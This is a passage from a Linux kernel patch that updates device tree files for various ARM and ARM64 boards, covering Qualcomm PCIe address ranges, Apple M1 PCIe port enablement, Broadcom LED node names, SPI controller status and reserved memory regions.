+ 	clock-frequency = <100000>;
+ };
+ 
++&mcspi1 {
++	status = "disabled";
++};
++
++&mcspi2 {
++	status = "disabled";
++};
++
++&mcspi3 {
++	status = "disabled";
++};
++
++&mcspi4 {
++	status = "disabled";
++};
++
+ &usb_otg_hs {
+ 	interface-type = <0>;
+ 	usb-phy = <&usb2_phy>;
+diff --git a/arch/arm/boot/dts/qcom-apq8064.dtsi b/arch/arm/boot/dts/qcom-apq8064.dtsi
+index a39b940d58532..4b57e9f5bc648 100644
+--- a/arch/arm/boot/dts/qcom-apq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-apq8064.dtsi
+@@ -1271,7 +1271,7 @@
+ 			gpu_opp_table: opp-table {
+ 				compatible = "operating-points-v2";
+ 
+-				opp-320000000 {
++				opp-450000000 {
+ 					opp-hz = /bits/ 64 <450000000>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-ipq4019.dtsi b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+index b23591110bd2b..02e13d8c222a0 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+@@ -426,8 +426,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x40200000 0x40200000 0 0x00100000>,
+-				 <0x82000000 0 0x40300000 0x40300000 0 0x00d00000>;
++			ranges = <0x81000000 0x0 0x00000000 0x40200000 0x0 0x00100000>,
++				 <0x82000000 0x0 0x40300000 0x40300000 0x0 0x00d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-ipq8064.dtsi b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+index 90c08b51680aa..0ce58cff30165 100644
+--- a/arch/arm/boot/dts/qcom-ipq8064.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq8064.dtsi
+@@ -1085,8 +1085,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x0fe00000 0x0fe00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x08000000 0x08000000 0 0x07e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0fe00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x08000000 0x08000000 0x0 0x07e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 35 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1136,8 +1136,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x31e00000 0x31e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x2e000000 0x2e000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x31e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x2e000000 0x2e000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 57 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1187,8 +1187,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x81000000 0 0x35e00000 0x35e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x32000000 0x32000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x35e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x32000000 0x32000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 71 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index 29fdf29fdb8c8..a4bf1d5ee2068 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -303,6 +303,45 @@
+ 			status = "disabled";
+ 		};
+ 
++		pcie_ep: pcie-ep@1c00000 {
++			compatible = "qcom,sdx55-pcie-ep";
++			reg = <0x01c00000 0x3000>,
++			      <0x40000000 0xf1d>,
++			      <0x40000f20 0xc8>,
++			      <0x40001000 0x1000>,
++			      <0x40200000 0x100000>,
++			      <0x01c03000 0x3000>;
++			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
++				    "mmio";
++
++			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
++
++			clocks = <&gcc GCC_PCIE_AUX_CLK>,
++				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLEEP_CLK>,
++				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
++			clock-names = "aux", "cfg", "bus_master", "bus_slave",
++				      "slave_q2a", "sleep", "ref";
++
++			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "global", "doorbell";
++			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
++			resets = <&gcc GCC_PCIE_BCR>;
++			reset-names = "core";
++			power-domains = <&gcc PCIE_GDSC>;
++			phys = <&pcie0_lane>;
++			phy-names = "pciephy";
++			max-link-speed = <3>;
++			num-lanes = <2>;
++
++			status = "disabled";
++		};
++
+ 		pcie0_phy: phy@1c07000 {
+ 			compatible = "qcom,sdx55-qmp-pcie-phy";
+ 			reg = <0x01c07000 0x1c4>;
+@@ -400,45 +439,6 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_ep: pcie-ep@40000000 {
+-			compatible = "qcom,sdx55-pcie-ep";
+-			reg = <0x01c00000 0x3000>,
+-			      <0x40000000 0xf1d>,
+-			      <0x40000f20 0xc8>,
+-			      <0x40001000 0x1000>,
+-			      <0x40200000 0x100000>,
+-			      <0x01c03000 0x3000>;
+-			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
+-				    "mmio";
+-
+-			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
+-
+-			clocks = <&gcc GCC_PCIE_AUX_CLK>,
+-				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
+-				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLEEP_CLK>,
+-				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
+-			clock-names = "aux", "cfg", "bus_master", "bus_slave",
+-				      "slave_q2a", "sleep", "ref";
+-
+-			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "global", "doorbell";
+-			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
+-			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
+-			resets = <&gcc GCC_PCIE_BCR>;
+-			reset-names = "core";
+-			power-domains = <&gcc PCIE_GDSC>;
+-			phys = <&pcie0_lane>;
+-			phy-names = "pciephy";
+-			max-link-speed = <3>;
+-			num-lanes = <2>;
+-
+-			status = "disabled";
+-		};
+-
+ 		remoteproc_mpss: remoteproc@4080000 {
+ 			compatible = "qcom,sdx55-mpss-pas";
+ 			reg = <0x04080000 0x4040>;
+diff --git a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+index a9d2bec990141..e15a3b2a9b399 100644
+--- a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
++++ b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+@@ -1880,6 +1880,21 @@
+ 		};
+ 	};
+ 
++	spi1_pins_b: spi1-1 {
++		pins1 {
++			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
++				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
++			bias-disable;
++			drive-push-pull;
++			slew-rate = <1>;
++		};
++
++		pins2 {
++			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
++			bias-disable;
++		};
++	};
++
+ 	spi2_pins_a: spi2-0 {
+ 		pins1 {
+ 			pinmux = <STM32_PINMUX('B', 10, AF5)>, /* SPI2_SCK */
+@@ -2448,19 +2463,4 @@
+ 			bias-disable;
+ 		};
+ 	};
+-
+-	spi1_pins_b: spi1-1 {
+-		pins1 {
+-			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
+-				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
+-			bias-disable;
+-			drive-push-pull;
+-			slew-rate = <1>;
+-		};
+-
+-		pins2 {
+-			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
+-			bias-disable;
+-		};
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j274.dts b/arch/arm64/boot/dts/apple/t8103-j274.dts
+index c1f3ba9c39f6a..997ef90614c11 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j274.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j274.dts
+@@ -33,10 +33,12 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -44,6 +46,14 @@
+ 	};
+ };
+ 
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
++
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j293.dts b/arch/arm64/boot/dts/apple/t8103-j293.dts
+index ecb10d237a053..3fd444ac8ae4e 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j293.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j293.dts
+@@ -21,21 +21,6 @@
+ 	brcm,board-type = "apple,honshu";
+ };
+ 
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+-
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j313.dts b/arch/arm64/boot/dts/apple/t8103-j313.dts
+index df741737b8e6f..9399c42de8a43 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j313.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j313.dts
+@@ -20,18 +20,3 @@
+ &wifi0 {
+ 	brcm,board-type = "apple,shikoku";
+ };
+-
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+diff --git a/arch/arm64/boot/dts/apple/t8103-j456.dts b/arch/arm64/boot/dts/apple/t8103-j456.dts
+index 8c6bf95925107..d80223fa42292 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j456.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j456.dts
+@@ -51,13 +51,23 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+ 		local-mac-address = [00 10 18 00 00 00];
+ 	};
+ };
++
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
+diff --git a/arch/arm64/boot/dts/apple/t8103-j457.dts b/arch/arm64/boot/dts/apple/t8103-j457.dts
+index fe7c0aaf7d62a..e24ccb49e33cc 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j457.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j457.dts
+@@ -33,6 +33,7 @@
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -40,12 +41,6 @@
+ 	};
+ };
+ 
+-/*
+- * Remove unused PCIe port and disable the associated DART.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
++&pcie0_dart_2 {
++	status = "okay";
+ };
+-
+-/delete-node/ &port01;
+diff --git a/arch/arm64/boot/dts/apple/t8103.dtsi b/arch/arm64/boot/dts/apple/t8103.dtsi
+index a4d195e9eb8c8..84fd1b1b48f6f 100644
+--- a/arch/arm64/boot/dts/apple/t8103.dtsi
++++ b/arch/arm64/boot/dts/apple/t8103.dtsi
+@@ -428,6 +428,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 699 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0_dart_2: iommu@683008000 {
+@@ -437,6 +438,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 702 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0: pcie@690000000 {
+@@ -511,6 +513,7 @@
+ 						<0 0 0 2 &port01 0 0 0 1>,
+ 						<0 0 0 3 &port01 0 0 0 2>,
+ 						<0 0 0 4 &port01 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 
+ 			port02: pci@2,0 {
+@@ -530,6 +533,7 @@
+ 						<0 0 0 2 &port02 0 0 0 1>,
+ 						<0 0 0 3 &port02 0 0 0 2>,
+ 						<0 0 0 4 &port02 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+index 839ca33178b01..d94a53d68320b 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+@@ -120,7 +120,7 @@
+ };
+ 
+ &leds {
+-	led-power@11 {
++	led@11 {
+ 		reg = <0x11>;
+ 		function = LED_FUNCTION_POWER;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -130,7 +130,7 @@
+ 		pinctrl-0 = <&pins_led_17_a>;
+ 	};
+ 
+-	led-wan-red@12 {
++	led@12 {
+ 		reg = <0x12>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_RED>;
+@@ -139,7 +139,7 @@
+ 		pinctrl-0 = <&pins_led_18_a>;
+ 	};
+ 
+-	led-wps@14 {
++	led@14 {
+ 		reg = <0x14>;
+ 		function = LED_FUNCTION_WPS;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -148,7 +148,7 @@
+ 		pinctrl-0 = <&pins_led_20_a>;
+ 	};
+ 
+-	led-wan-white@15 {
++	led@15 {
+ 		reg = <0x15>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -157,7 +157,7 @@
+ 		pinctrl-0 = <&pins_led_21_a>;
+ 	};
+ 
+-	led-lan@19 {
++	led@19 {
+ 		reg = <0x19>;
+ 		function = LED_FUNCTION_LAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+index dac9d3b4e91df..df71348542064 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+@@ -253,7 +253,7 @@
+ 			};
+ 		};
+ 
+-		procmon: syscon@280000 {
++		procmon: bus@280000 {
+ 			compatible = "simple-bus";
+ 			reg = <0x280000 0x1000>;
+ 			ranges;
+@@ -532,7 +532,7 @@
+ 			reg = <0x1800 0x600>, <0x2000 0x10>;
+ 			reg-names = "nand", "nand-int-base";
+ 			interrupts = <GIC_SPI 37 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "nand";
++			interrupt-names = "nand_ctlrdy";
+ 			status = "okay";
+ 
+ 			nandcs: nand@0 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index 4b314435f8fd6..50367da93cd79 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -935,7 +935,7 @@
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+ 				regulator-min-microvolt = <606250>;
+-				regulator-max-microvolt = <1193750>;
++				regulator-max-microvolt = <800000>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+index 5cdc7ac1a9c06..c7de5e3b071ef 100644
+--- a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
++++ b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+@@ -742,8 +742,7 @@
+ &pmi8994_spmi_regulators {
+ 	vdd_s2-supply = <&vph_pwr>;
+ 
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index a7c7ca980a71c..c3492a3831558 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -436,10 +436,8 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0 0x20200000 0x0 0x10000>,
++				 <0x82000000 0x0 0x20220000 0x0 0x20220000 0x0 0xfde0000>;
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 05b97b05d4462..3f7cf3fdd319f 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -750,10 +750,8 @@
+ 			phys = <&pcie_phy1>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x10000>,   /* downstream I/O */
+-				 <0x82000000 0 0x10220000 0x10220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x10200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x10220000 0x10220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -814,10 +812,8 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x20200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x20220000 0x20220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index 465b2828acbd4..13b8823ae063a 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -60,11 +60,6 @@
+ 			reg = <0x0 0x05000000 0x0 0x1a00000>;
+ 			no-map;
+ 		};
+-
+-		reserved@6c00000 {
+-			reg = <0x0 0x06c00000 0x0 0x400000>;
+-			no-map;
+-		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+index 7e2c0dcc11ab1..4801d973f9d7c 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /* Copyright (c) 2015, Huawei Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2023, Petr Vorel <petr.vorel@gmail.com>
+  */
+ 
+ /dts-v1/;
+@@ -30,13 +30,18 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
++		cont_splash_mem: memory@3401000 {
++			reg = <0 0x03401000 0 0x1000000>;
++			no-map;
++		};
++
+ 		tzapp_mem: tzapp@4800000 {
+ 			reg = <0 0x04800000 0 0x1900000>;
+ 			no-map;
+ 		};
+ 
+-		removed_region: reserved@6300000 {
+-			reg = <0 0x06300000 0 0xD00000>;
++		reserved@6300000 {
++			reg = <0 0x06300000 0 0x700000>;
+ 			no-map;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+index f9d8bd09e074a..c6145ee8b278e 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+@@ -542,8 +542,7 @@
+ };
+ 
+ &pmi8994_spmi_regulators {
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+index ff60b7004d260..2ecf455db8307 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+@@ -173,8 +173,7 @@
+ 	 * power domain.. which still isn't enough and forces us to bind
+ 	 * OXILI_CX and OXILI_GX together!
+ 	 */
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8994.dtsi b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+index ded5b7ceeaf97..7ed59e698c14d 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+@@ -227,6 +227,11 @@
+ 			reg = <0 0xc9400000 0 0x3f00000>;
+ 			no-map;
+ 		};
++
++		reserved@6c00000 {
++			reg = <0 0x06c00000 0 0x400000>;
++			no-map;
++		};
+ 	};
+ 
+ 	smd {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index c103034372fd7..67b87915d8224 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -1828,8 +1828,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0c200000 0x0c200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0c200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1882,8 +1882,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0d200000 0x0d200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0d200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1933,8 +1933,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0e200000 0x0e200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0e200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
+ 
+ 				device_type = "pci";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index f05f16ac5cc18..29c60bb56ed5f 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -916,7 +916,7 @@
+ 			phy-names = "pciephy";
+ 			status = "disabled";
+ 
+-			ranges = <0x01000000 0x0 0x1b200000 0x1b200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x1b200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x1b300000 0x1b300000 0x0 0xd00000>;
+ 
+ 			#interrupt-cells = <1>;
+@@ -1513,7 +1513,7 @@
+ 			compatible = "arm,coresight-stm", "arm,primecell";
+ 			reg = <0x06002000 0x1000>,
+ 			      <0x16280000 0x180000>;
+-			reg-names = "stm-base", "stm-data-base";
++			reg-names = "stm-base", "stm-stimulus-base";
+ 			status = "disabled";
+ 
+ 			clocks = <&rpmcc RPM_SMD_QDSS_CLK>, <&rpmcc RPM_SMD_QDSS_A_CLK>;
+diff --git a/arch/arm64/boot/dts/qcom/pmi8994.dtsi b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+index 542c215dde107..82b60e988d0f5 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+@@ -49,8 +49,6 @@
+ 
+ 		pmi8994_spmi_regulators: regulators {
+ 			compatible = "qcom,pmi8994-regulators";
+-			#address-cells = <1>;
+-			#size-cells = <1>;
+ 		};
+ 
+ 		pmi8994_wled: wled@d800 {
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+index 850776c5323d1..70d5a7aa88735 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+@@ -26,7 +26,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <58 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		hid-descr-addr = <0x20>;
+ 
+ 		wakeup-source;
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+index 56d787785fd59..2e35c69a978fb 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+@@ -39,7 +39,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <0 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		post-power-on-delay-ms = <100>;
